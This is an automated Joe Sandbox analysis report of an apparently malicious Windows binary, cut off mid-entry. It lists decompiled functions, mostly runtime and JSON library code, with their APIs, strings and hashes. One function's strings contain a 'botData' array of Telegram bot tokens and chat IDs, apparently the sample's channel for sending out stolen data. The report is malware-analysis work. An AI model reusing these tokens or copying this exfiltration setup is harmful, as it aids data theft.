Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: ' is not a number.
API String ID: 3668304517-698141950
Opcode ID: 6fe4ff8f585701c86da8c867bb3c9c85db543fd1f3799b5e0abbe7abe3d6ccda
Instruction ID: 63e3c904b744804fcb1710507be7f1253842dc91153c7836574a865d0886f93f
Opcode Fuzzy Hash: 6fe4ff8f585701c86da8c867bb3c9c85db543fd1f3799b5e0abbe7abe3d6ccda
Instruction Fuzzy Hash: FCD1E262E18B8285EB10EF64D8413ED7760FB95798F509236EE5C63ADADF38D181D300

Function 00007FF643F62348 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF643F623A9
IsDebuggerPresent.KERNEL32 ref: 00007FF643F623C1
OutputDebugStringW.KERNEL32 ref: 00007FF643F623D2

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF643F623CB

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: 1596f6ca38e6fed48fde224f6c62878a643fdc611c776942bb091bdbc39c011d
Instruction ID: 24606a74246486bc2bcc519f5dce67c0403803dd0307fe0acbf8720e8ba3f75c
Opcode Fuzzy Hash: 1596f6ca38e6fed48fde224f6c62878a643fdc611c776942bb091bdbc39c011d
Instruction Fuzzy Hash: B7112B32618B82A6E784BF62D6563B932A5FF44344F405135CA4D93AA0EF7CE4A8D710

Function 00007FF643F4F910 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 310COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF643F62A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A68
Part of subcall function 00007FF643F62A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A6E

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F4FD57

Strings

Missing ',' or ']' in array declaration, xrefs: 00007FF643F4FC2D
in Json::Value::operator[](int index): index cannot be negative, xrefs: 00007FF643F4FD70

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn
String ID: Missing ',' or ']' in array declaration$in Json::Value::operator[](int index): index cannot be negative
API String ID: 4131450254-2107479676
Opcode ID: 2a2ab2c3f64ccb906fca6c33ab773da500c7988fe9955a56a7d70a0e634df760
Instruction ID: 030805b08db8edc5ecb3f872a6e5bc84fc7ce9a17a9a1f54bfe91404b352b009
Opcode Fuzzy Hash: 2a2ab2c3f64ccb906fca6c33ab773da500c7988fe9955a56a7d70a0e634df760
Instruction Fuzzy Hash: 01D18162A0CB4282EAA4FB15E55237EA3A1FBA5B84F405131DB8E93BD5DF3CE541D300

Function 00007FF643F841C8 Relevance: 4.7, APIs: 3, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF643F76F84: GetLastError.KERNEL32 ref: 00007FF643F76F93
Part of subcall function 00007FF643F76F84: FlsGetValue.KERNEL32 ref: 00007FF643F76FA8
Part of subcall function 00007FF643F76F84: SetLastError.KERNEL32 ref: 00007FF643F77033

Part of subcall function 00007FF643F76F84: FlsSetValue.KERNEL32 ref: 00007FF643F76FC9

GetLocaleInfoW.KERNEL32 ref: 00007FF643F84234

Part of subcall function 00007FF643F7C228: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7C245

GetLocaleInfoW.KERNEL32 ref: 00007FF643F8427D

Part of subcall function 00007FF643F7C228: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7C29E

GetLocaleInfoW.KERNEL32 ref: 00007FF643F84345

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
String ID:
API String ID: 1791019856-0
Opcode ID: 222b0e861e182a54b612e5ee44c9166181b4c14f1b52bbd9ed51d65b411f0d9c
Instruction ID: 259782896f0af6baf9c0afed78d906ace7fced31eb9b48c2e2ea2aa75d5855b9
Opcode Fuzzy Hash: 222b0e861e182a54b612e5ee44c9166181b4c14f1b52bbd9ed51d65b411f0d9c
Instruction Fuzzy Hash: E8615B32A0C64286EBA8BF12E54226963A1FB44745F948135DB9DE36D5DF3CE451E700

Function 00007FF643F78D4C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FF643F74F9A), ref: 00007FF643F78DC0

Strings

GetLocaleInfoEx, xrefs: 00007FF643F78D68, 00007FF643F78D79

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: b882f90ffef5444c931e402aee2dbbae8b06f37c4ee4b5221b82b3988a7afd4d
Instruction ID: b85201ba6ee142bc9cae6d15f557ca5d2d59c280270cbd7a47425adfcc600efc
Opcode Fuzzy Hash: b882f90ffef5444c931e402aee2dbbae8b06f37c4ee4b5221b82b3988a7afd4d
Instruction Fuzzy Hash: 08016221B0DB41C5EB84BF56B4424AAA764EF98BD0F984036DE4DA3BE5CF3CE5419740

Function 00007FF643F8070C Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5160664705158667e81bab6cdbde4881878e179a89be4c9fa1c4695460aa44ee
Instruction ID: 553880ddc86228e3598fa3426644b11a4168bdefdb66a9a9e874b2c7c5952d47
Opcode Fuzzy Hash: 5160664705158667e81bab6cdbde4881878e179a89be4c9fa1c4695460aa44ee
Instruction Fuzzy Hash: BF51F622B0868255FBA8BB72E8416AE7BA1BB40794F444135EE9CB7BD9CF3CD001D700

Function 00007FF643F84410 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF643F76F84: GetLastError.KERNEL32 ref: 00007FF643F76F93
Part of subcall function 00007FF643F76F84: FlsGetValue.KERNEL32 ref: 00007FF643F76FA8
Part of subcall function 00007FF643F76F84: SetLastError.KERNEL32 ref: 00007FF643F77033

Part of subcall function 00007FF643F76F84: FlsSetValue.KERNEL32 ref: 00007FF643F76FC9

GetLocaleInfoW.KERNEL32 ref: 00007FF643F84478

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ErrorLastValue$InfoLocale
String ID:
API String ID: 673564084-0
Opcode ID: 5a86f6551b3228d9c0916b14b2249d7917d42bd6171e235b69f918e9520d1485
Instruction ID: a0d0177cbfffb3f8bc677a7285b1f49cf1f4995d537ca1e984bb38c1647225aa
Opcode Fuzzy Hash: 5a86f6551b3228d9c0916b14b2249d7917d42bd6171e235b69f918e9520d1485
Instruction Fuzzy Hash: A9315032A0C68286EBACFB22E4427AA63A1FB84784F548135DA4DD36D5DF3CE4559740

Function 00007FF643F84060 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF643F76F84: GetLastError.KERNEL32 ref: 00007FF643F76F93
Part of subcall function 00007FF643F76F84: FlsGetValue.KERNEL32 ref: 00007FF643F76FA8
Part of subcall function 00007FF643F76F84: SetLastError.KERNEL32 ref: 00007FF643F77033

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF643F8484F,?,00000000,00000092,?,?,00000000,?,00007FF643F74DC1), ref: 00007FF643F840FE

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: ef01aa4e10b798d8c1182b42df3aa6388aa70aed32a0fba372173c71e43b78bb
Instruction ID: cc32921835b57da24e63e93650fdcccf90c863ada8e6b0a59e1cf37c53210a9e
Opcode Fuzzy Hash: ef01aa4e10b798d8c1182b42df3aa6388aa70aed32a0fba372173c71e43b78bb
Instruction Fuzzy Hash: C0110267E0C645CAEB99BF17D4412AA7BA0FB50BA0F548131C669933D0CF28D5E1D740

Function 00007FF643F84618 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF643F76F84: GetLastError.KERNEL32 ref: 00007FF643F76F93
Part of subcall function 00007FF643F76F84: FlsGetValue.KERNEL32 ref: 00007FF643F76FA8
Part of subcall function 00007FF643F76F84: SetLastError.KERNEL32 ref: 00007FF643F77033

GetLocaleInfoW.KERNEL32(?,?,?,00007FF643F843C2), ref: 00007FF643F8464F

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ErrorLast$InfoLocaleValue
String ID:
API String ID: 3796814847-0
Opcode ID: 67ccf32ae814a0d26bdbbaf8c5a0f09707bf70b588967180c96548bb5e4f4159
Instruction ID: b09903d87437101fb4c63920a7adc68edc23962dc0e161557ea1df086be4b3cc
Opcode Fuzzy Hash: 67ccf32ae814a0d26bdbbaf8c5a0f09707bf70b588967180c96548bb5e4f4159
Instruction Fuzzy Hash: FD112B32B1C55282E7ACBF26A05667AA290EB40764F644631D62DA7AC0DF29D8819700

Function 00007FF643F84130 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF643F76F84: GetLastError.KERNEL32 ref: 00007FF643F76F93
Part of subcall function 00007FF643F76F84: FlsGetValue.KERNEL32 ref: 00007FF643F76FA8
Part of subcall function 00007FF643F76F84: SetLastError.KERNEL32 ref: 00007FF643F77033

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF643F8480B,?,00000000,00000092,?,?,00000000,?,00007FF643F74DC1), ref: 00007FF643F841AE

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: c556c0bea6b83112df6ab32f4da6f1a2c3745ef5e59afe02ddedd8d95d463359
Instruction ID: 4cc828080a81447b5a119e93c2e07c23876e55426b28a42d4b16697387d349db
Opcode Fuzzy Hash: c556c0bea6b83112df6ab32f4da6f1a2c3745ef5e59afe02ddedd8d95d463359
Instruction Fuzzy Hash: E301F562F0C68286E79D7F17E8417B976A1EB607A4F518231D639936D4DF289481A700

Function 00007FF643F78874 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF643F78D1B,?,?,?,?,?,?,?,?,00000000,00007FF643F836B0), ref: 00007FF643F788C3

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 580ba48c80ce648dc1850835b2af7c4fe86649764c2b91a200ae029b4e583e33
Instruction ID: 183be5ca5f85b1dfa53d143cfb8367c0000c3a95aa7b9d0df6faa9196c217050
Opcode Fuzzy Hash: 580ba48c80ce648dc1850835b2af7c4fe86649764c2b91a200ae029b4e583e33
Instruction Fuzzy Hash: 8EF06DB1B08B4182E780FB19F8921A92361EB88780F548135EA0DE33A5CF3CD5559340

Function 00007FF643F81EF8 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF643F81EFC

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 2b7369aa21f13457fdb80794d56569737c8fbd0d1e1785f4d2f6eb8c1f94b77e
Instruction ID: fb5413d852635e04275e70b1e7c998a8ebe781cd20253505f76d8ab701a0c994
Opcode Fuzzy Hash: 2b7369aa21f13457fdb80794d56569737c8fbd0d1e1785f4d2f6eb8c1f94b77e
Instruction Fuzzy Hash: 90B09220E0BB07C2EA887F11AC4331422A87F48B00F858038C80DB2370DF2C21B9A710

Function 00007FF643F88D10 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93d4f47f0554419e45a1ec9d0f821d131654d7134ca0c2c872342092d7dd02b
Instruction ID: 7aadf8e54e525f8150674506becd9d17e013ba6b04960eb884fef6934f2effc7
Opcode Fuzzy Hash: d93d4f47f0554419e45a1ec9d0f821d131654d7134ca0c2c872342092d7dd02b
Instruction Fuzzy Hash: 7BF044B27186568ADBD8EF28A803A297794F708384F808539D589D7E54DB3C90509F04

Function 00007FF643F638CC Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 331b233821632d522d8aa5d39469b012a11824c95e81c535aefe4626e22429b9
Instruction ID: 12089c025ad22b54752938663fbd0aee68858e6c5b161193585a0720e798324b
Opcode Fuzzy Hash: 331b233821632d522d8aa5d39469b012a11824c95e81c535aefe4626e22429b9
Instruction Fuzzy Hash: 84A00122A0C882D4E684BF10A9524642270AB50300B406232C40DA60B19E2CE84AA310

Function 00007FF643F5CDF0 Relevance: 38.9, APIs: 6, Strings: 16, Instructions: 389COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F5D3DF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F5D3E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F5D3EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F5D3F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F5D3F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F5D3FD

Strings

useSpecialFloats, xrefs: 00007FF643F5CF17
All, xrefs: 00007FF643F5CFB8
emitUTF8, xrefs: 00007FF643F5CF43
precision, xrefs: 00007FF643F5CF6F
: , xrefs: 00007FF643F5D097
null, xrefs: 00007FF643F5D0F1
decimal, xrefs: 00007FF643F5D066
commentStyle, xrefs: 00007FF643F5CE63
precisionType, xrefs: 00007FF643F5CE90
enableYAMLCompatibility, xrefs: 00007FF643F5CEC0
None, xrefs: 00007FF643F5CFED
dropNullPlaceholders, xrefs: 00007FF643F5CEEB
precisionType must be 'significant' or 'decimal', xrefs: 00007FF643F5D3A5
significant, xrefs: 00007FF643F5D034
indentation, xrefs: 00007FF643F5CE33
commentStyle must be 'All' or 'None', xrefs: 00007FF643F5D3C2

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: : $All$None$commentStyle$commentStyle must be 'All' or 'None'$decimal$dropNullPlaceholders$emitUTF8$enableYAMLCompatibility$indentation$null$precision$precisionType$precisionType must be 'significant' or 'decimal'$significant$useSpecialFloats
API String ID: 3668304517-1515510190
Opcode ID: 8e8e43b97737ee5d4a0d66c8873ca1e6bd3003a91424e30525bf8069139e92c6
Instruction ID: 800c6d672d45fd1ac3a392796407772fb173fc9dc21d8cc04445dab05aa9491d
Opcode Fuzzy Hash: 8e8e43b97737ee5d4a0d66c8873ca1e6bd3003a91424e30525bf8069139e92c6
Instruction Fuzzy Hash: D0F1B462A0D78285EB90BB25E4423F92791EF45398F409136E95DA7ADBEE7CE444E300

Function 00007FF643F51410 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 393COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F518E9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F518F5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F518FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F51901
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F51907
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F5190D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F51913
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F51919
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F519A8

Strings

for detail., xrefs: 00007FF643F517A0
See , xrefs: 00007FF643F51756

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: for detail.$See
API String ID: 3668304517-4250990345
Opcode ID: b007f3ce75071648310378d29781fe5e5159f84a7405af41eb14086d5de9e148
Instruction ID: e8678a6f54a4288a5b84e6a85d3bfd6de3d271bff78338ccb7cb1c1106c77580
Opcode Fuzzy Hash: b007f3ce75071648310378d29781fe5e5159f84a7405af41eb14086d5de9e148
Instruction Fuzzy Hash: F0F1C062F1CB8245FF50FB64D1427AC2361AB557E8F109731DE6D63AD7DE78A082A300

Function 00007FF643F2ADB0 Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 461COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2B4B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2B508
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2B50E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2B557

Strings

const botData = [ { token: "7393424100:AAFLvSKBupyvFiHgVXYbSv1Jfy8ydDSOnIA", chat_id: "6442787215", }, { token: "7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ", , xrefs: 00007FF643F2AE07
ios_base::eofbit set, xrefs: 00007FF643F2B4C8, 00007FF643F2B51D
Error writing to file: , xrefs: 00007FF643F2B2D0
ios_base::failbit set, xrefs: 00007FF643F2B4C1, 00007FF643F2B516
Error opening file: , xrefs: 00007FF643F2AE72
ios_base::badbit set, xrefs: 00007FF643F2AFC3, 00007FF643F2B2C4

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: const botData = [ { token: "7393424100:AAFLvSKBupyvFiHgVXYbSv1Jfy8ydDSOnIA", chat_id: "6442787215", }, { token: "7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ", $Error opening file: $Error writing to file: $ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3668304517-3574094325
Opcode ID: 001b823d7f1ee9be339957d99efd59f1a5fd07df3d876c31017bc05864d3515b
Instruction ID: 9a2fc8488a8446db2852b41d1cc8988bae557d4aaf060ed1eb33a19e4b2f1052
Opcode Fuzzy Hash: 001b823d7f1ee9be339957d99efd59f1a5fd07df3d876c31017bc05864d3515b
Instruction Fuzzy Hash: 2622CE62A1CA82C9EB50FF64D9423EC23A0FB44798F544231DE5DA7AD9EF79E541D300

Function 00007FF643F6DEC8 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 407COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6DEF7
_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6DFC7

Strings

0, xrefs: 00007FF643F6E003
0, xrefs: 00007FF643F6DFF1
0, xrefs: 00007FF643F6DF99

Memory Dump Source

